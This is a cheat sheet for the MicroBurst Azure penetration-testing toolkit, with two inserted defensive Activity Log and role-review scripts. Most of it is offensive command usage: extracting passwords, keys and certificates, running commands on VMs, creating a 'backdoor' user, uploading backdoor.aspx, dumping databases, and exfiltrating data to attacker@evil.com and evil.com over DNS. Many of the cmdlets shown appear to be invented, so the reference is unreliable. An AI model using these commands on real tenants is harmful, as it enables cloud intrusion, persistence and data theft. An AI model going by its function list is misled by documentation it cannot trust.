MicroBurst Azure Security Testing Toolkit Cheat Sheet

Overview

MicroBurst is a collection of PowerShell scripts developed by NetSPI for assessing Microsoft Azure security. It includes tools for Azure service discovery, privilege escalation, lateral movement, and data exfiltration, making it a comprehensive toolkit for Azure penetration testing.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

```powershell
# Install from PowerShell Gallery
Install-Module -Name MicroBurst

# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser

# Update existing installation
Update-Module -Name MicroBurst

# Import module
Import-Module MicroBurst
```

Manual Installation

```powershell
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"

# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1

# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
```

Git Installation

```bash
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst

# Import in PowerShell
Import-Module .\MicroBurst.psd1
```

Basic Usage

Module Setup

```powershell
# Import MicroBurst
Import-Module MicroBurst

# Get available commands
Get-Command -Module MicroBurst

# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full

# Check module version
Get-Module MicroBurst
```

Authentication

```powershell
# Interactive authentication
Connect-AzAccount

# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"

# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
```

Command Reference

Reconnaissance Functions

| Function | Description |
|---|---|
| Invoke-EnumerateAzureBlobs | Enumerate Azure storage blobs |
| Invoke-EnumerateAzureSubDomains | Enumerate Azure subdomains |
| Get-AzurePasswords | Extract passwords from Azure resources |
| Get-AzureDomainInfo | Get domain information |
| Invoke-AzureRmVmBulkCMD | Execute commands on multiple VMs |

Storage Account Functions

| Function | Description |
|---|---|
| Invoke-EnumerateAzureBlobs | Find accessible storage blobs |
| Get-AzureBlobFiles | Download files from storage |
| Invoke-AzureStorageAccountEnum | Enumerate storage accounts |
| Get-AzureStorageAccountKeys | Extract storage account keys |

Virtual Machine Functions

| Function | Description |
|---|---|
| Invoke-AzureRmVmBulkCMD | Bulk command execution |
| Get-AzureVMDisk | Access VM disk information |
| Invoke-AzureVMUserDataEnum | Enumerate VM user data |
| Get-AzureVMExtensionSettings | Get VM extension settings |

Azure Storage Enumeration

Blob Storage Discovery

```powershell
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"

# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"

# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")

# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
```

Storage Account Enumeration

```powershell
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"

# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"

# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"

# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
```

File Share Enumeration

```powershell
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"

# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"

# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
```

Subdomain and Service Discovery

Azure Subdomain Enumeration

```powershell
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"

# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")

# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")

# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
```

Service Discovery

```powershell
# Discover Azure services
Get-AzureServices -Domain "company.com"

# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"

# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"

# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
```

DNS Enumeration

```powershell
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"

# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"

# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
```

Virtual Machine Exploitation

VM Command Execution

```powershell
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"

# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"

# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
```

VM Disk Access

```powershell
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"

# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"

# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"

# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
```

VM Extension Exploitation

```powershell
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"

# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"

# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
```
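Every technique in the three VM subsections above (Run Command, extension installs, disk snapshots and disk SAS grants) is a control-plane call that lands in the Azure Activity Log. The following is an added example, not MicroBurst code, that pulls those events for review; it assumes the Az.Monitor module with an authenticated context holding Reader on the subscription, the function name Find-VmControlPlaneEvents is mine, and the operation-name strings are taken from my own logs and should be checked against yours.

```powershell
# Added example (not part of MicroBurst): review the Activity Log for the control-plane operations
# behind VM command execution, extension deployment and disk access. Assumes Az.Monitor + Az.Accounts.
function Find-VmControlPlaneEvents {
    [CmdletBinding()]
    param(
        [int]$LookbackHours = 24,
        [string]$ResourceGroupName,   # optional narrowing; default is the whole subscription
        # Operation names as they appear in the Activity Log (assumption: verify against your tenant's entries)
        [string[]]$Operations = @(
            'Microsoft.Compute/virtualMachines/runCommand/action',
            'Microsoft.Compute/virtualMachines/extensions/write',
            'Microsoft.Compute/snapshots/write',
            'Microsoft.Compute/disks/beginGetAccess/action'   # SAS grant on a managed disk
        )
    )

    $query = @{ StartTime = (Get-Date).AddHours(-$LookbackHours); EndTime = Get-Date; MaxRecord = 1000 }
    if ($ResourceGroupName) { $query.ResourceGroupName = $ResourceGroupName }

    Get-AzActivityLog @query |
        ForEach-Object {
            # Older Az.Monitor builds expose OperationName/Status as localizable objects, newer ones as strings.
            $op     = if ($_.OperationName -is [string]) { $_.OperationName } else { $_.OperationName.Value }
            $status = if ($_.Status -is [string])        { $_.Status }        else { $_.Status.Value }
            if ($Operations -contains $op) {
                [pscustomobject]@{
                    Time          = $_.EventTimestamp
                    Caller        = $_.Caller          # UPN, or the app/object id of a service principal or managed identity
                    Operation     = $op
                    Status        = $status
                    Resource      = $_.ResourceId
                    CorrelationId = $_.CorrelationId   # shared by the Started and Succeeded/Failed entries of one request
                }
            }
        } |
        # One row per request (its terminal status) instead of the Started/Succeeded pair.
        Group-Object CorrelationId |
        ForEach-Object { $_.Group | Sort-Object Time | Select-Object -Last 1 }
}

# Usage: any caller here that is not your deployment pipeline or VM operators deserves a look
Find-VmControlPlaneEvents -LookbackHours 72 | Format-Table Time, Caller, Operation, Status, Resource
```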

Credential and Secret Extraction

Password Extraction

```powershell
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"

# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")

# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"

# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
```

Certificate Extraction

```powershell
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"

# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"

# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
```

Configuration Data Extraction

```powershell
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"

# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"

# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
```

Database Exploitation

SQL Database Enumeration

```powershell
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"

# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"

# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"

# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
```

SQL Database Access

```powershell
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred

# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"

# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"

# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
```

CosmosDB Exploitation

```powershell
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"

# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"

# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
```

Web Application Exploitation

Web App Enumeration

```powershell
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"

# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"

# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"

# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
```

Web App Exploitation

```powershell
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"

# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"

# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"

# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
```

Function App Exploitation

```powershell
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"

# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"

# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload

# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
```

Privilege Escalation

Role Assignment Enumeration

```powershell
# Get current user roles
Get-AzureCurrentUserRoles

# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"

# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"

# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
```

Service Principal Abuse

```powershell
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"

# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"

# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
```
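The defender's view of the role-assignment and service-principal data the two sections above enumerate, added here as an example that is not MicroBurst code: it lists holders of privileged built-in RBAC roles, marks assignments at root, management-group or subscription scope as broad, and ranks service principals holding broad privileged roles first, because their secrets and certificates are exactly what credential-harvesting tooling goes after. It assumes Az.Accounts and Az.Resources with an authenticated context holding Reader on the subscription; the function name Get-PrivilegedRoleAssignment is mine.

```powershell
# Added example (not part of MicroBurst): find who holds privileged Azure RBAC roles and how broadly.
# Assumes Az.Accounts + Az.Resources and an authenticated Az context.
function Get-PrivilegedRoleAssignment {
    [CmdletBinding()]
    param(
        [string]$SubscriptionId,
        # Built-in roles that can change data, permissions or both; extend with your own custom roles.
        [string[]]$PrivilegedRoles = @('Owner', 'Contributor', 'User Access Administrator',
                                       'Role Based Access Control Administrator')
    )

    if ($SubscriptionId) { Set-AzContext -SubscriptionId $SubscriptionId | Out-Null }
    $subScope = "/subscriptions/$((Get-AzContext).Subscription.Id)"

    # Without -Scope, Get-AzRoleAssignment returns every assignment visible at subscription scope,
    # including ones inherited from management groups and the root ('/') scope.
    Get-AzRoleAssignment |
        Where-Object { $PrivilegedRoles -contains $_.RoleDefinitionName } |
        ForEach-Object {
            $broad = ($_.Scope -eq '/') -or ($_.Scope -eq $subScope) -or
                     ($_.Scope -like '/providers/Microsoft.Management/managementGroups/*')
            $isSp  = ($_.ObjectType -eq 'ServicePrincipal')
            [pscustomobject]@{
                Principal      = if ($_.SignInName) { $_.SignInName } else { $_.DisplayName }
                ObjectId       = $_.ObjectId
                # User, Group, ServicePrincipal (managed identities included), or Unknown for a deleted
                # principal whose assignment was never cleaned up (a finding in its own right).
                PrincipalType  = $_.ObjectType
                Role           = $_.RoleDefinitionName
                Scope          = $_.Scope
                BroadScope     = $broad
                # Non-human identities with broad privileged roles get reviewed first.
                ReviewPriority = if ($isSp -and $broad) { 'High' } elseif ($broad -or $isSp) { 'Medium' } else { 'Low' }
            }
        } |
        Sort-Object @{ Expression = { @{ High = 0; Medium = 1; Low = 2 }[$_.ReviewPriority] } }, Role
}

# Usage
Get-PrivilegedRoleAssignment | Format-Table Principal, PrincipalType, Role, Scope, ReviewPriority
```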

Managed Identity Exploitation

```powershell
# Check for managed identity
Test-AzureManagedIdentity

# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"

# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
```

Lateral Movement

Cross-Subscription Access

```powershell
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions

# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"

# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
```

Cross-Tenant Access

```powershell
# Enumerate accessible tenants
Get-AzureAccessibleTenants

# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"

# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
```

Resource Group Pivoting

```powershell
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"

# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"

# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
```

Data Exfiltration

Bulk Data Extraction

```powershell
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"

# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"

# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
```

Stealth Exfiltration

```powershell
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"

# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"

# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
```

Automation and Scripting

Automated Assessment Script

```powershell
# Comprehensive Azure assessment
param(
    [string]$SubscriptionId,
    [string]$OutputPath = "C:\AzureAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force

# Authenticate
Connect-AzAccount

# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId

# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains | Out-File "$OutputPath\subdomains.txt"

# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs | Out-File "$OutputPath\blobs.txt"

# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords | Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation

# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms | Export-Csv "$OutputPath\vms.csv" -NoTypeInformation

# Generate summary report
$summary = @{
    AssessmentDate = Get-Date
    SubscriptionId = $SubscriptionId
    SubdomainsFound = $subdomains.Count
    BlobsFound = $blobs.Count
    PasswordsFound = $passwords.Count
    VMsFound = $vms.Count
}

$summary | ConvertTo-Json | Out-File "$OutputPath\summary.json"

Write-Host "Assessment completed. Results saved to $OutputPath"
```

Continuous Monitoring

```powershell
# Continuous Azure monitoring
param(
    [int]$IntervalMinutes = 60,
    [string]$LogPath = "C:\AzureMonitoring\monitor.log"
)

while ($true) {
    $timestamp = Get-Date
    Write-Output "[$timestamp] Starting Azure monitoring cycle" | Tee-Object -FilePath $LogPath -Append

    try {
        # Check for new storage accounts
        $newStorage = Get-AzStorageAccount | Where-Object {$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newStorage) {
            Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)" | Tee-Object -FilePath $LogPath -Append
        }

        # Check for new VMs
        $newVMs = Get-AzVM | Where-Object {$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newVMs) {
            Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)" | Tee-Object -FilePath $LogPath -Append
        }

        # Check for new role assignments
        $newRoles = Get-AzRoleAssignment | Where-Object {$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)}
        if ($newRoles) {
            Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)" | Tee-Object -FilePath $LogPath -Append
        }
    }
    catch {
        Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)" | Tee-Object -FilePath $LogPath -Append
    }

    Start-Sleep -Seconds ($IntervalMinutes * 60)
}
```

Troubleshooting

Authentication Issues

```powershell
# Clear cached credentials
Clear-AzContext -Force

# Test authentication
$context = Get-AzContext
if (-not $context) {
    Write-Error "Not authenticated to Azure"
    Connect-AzAccount
}

# Verify subscription access
Get-AzSubscription
```

Module Issues

```powershell
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable

# Update MicroBurst
Update-Module MicroBurst -Force

# Check dependencies
Get-Module Az -ListAvailable
```

Permission Issues

```powershell
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments | Select-Object RoleDefinitionName, Scope

# Test specific permissions
try {
    Get-AzStorageAccount -ErrorAction Stop
    Write-Output "Storage account read permission: OK"
}
catch {
    Write-Output "Storage account read permission: DENIED"
}
```

Integration with Other Tools

BloodHound Integration

```powershell
# Export data for BloodHound
$azureData = @{
    users = Get-AzADUser
    groups = Get-AzADGroup
    servicePrincipals = Get-AzADServicePrincipal
    roleAssignments = Get-AzRoleAssignment
}

# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData | ConvertTo-Json -Depth 3 | Out-File "azure_bloodhound.json"
```

Metasploit Integration

```ruby
# Metasploit module for MicroBurst
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Azure MicroBurst Integration',
      'Description'    => 'Execute MicroBurst functions via Metasploit',
      'Author'         => ['NetSPI'],
      'License'        => MSF_LICENSE
    ))

    register_options([
      OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
      OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
    ])
  end

  def run
    subscription_id = datastore['SUBSCRIPTION_ID']
    function = datastore['FUNCTION']

    # Execute MicroBurst function
    powershell_cmd = "Import-Module MicroBurst; #{function} -SubscriptionId #{subscription_id}"

    print_status("Executing: #{powershell_cmd}")
    # Execute PowerShell command
  end
end
```

Resources


This cheat sheet provides a comprehensive reference for using MicroBurst. Always ensure you have proper authorization before conducting Azure security assessments.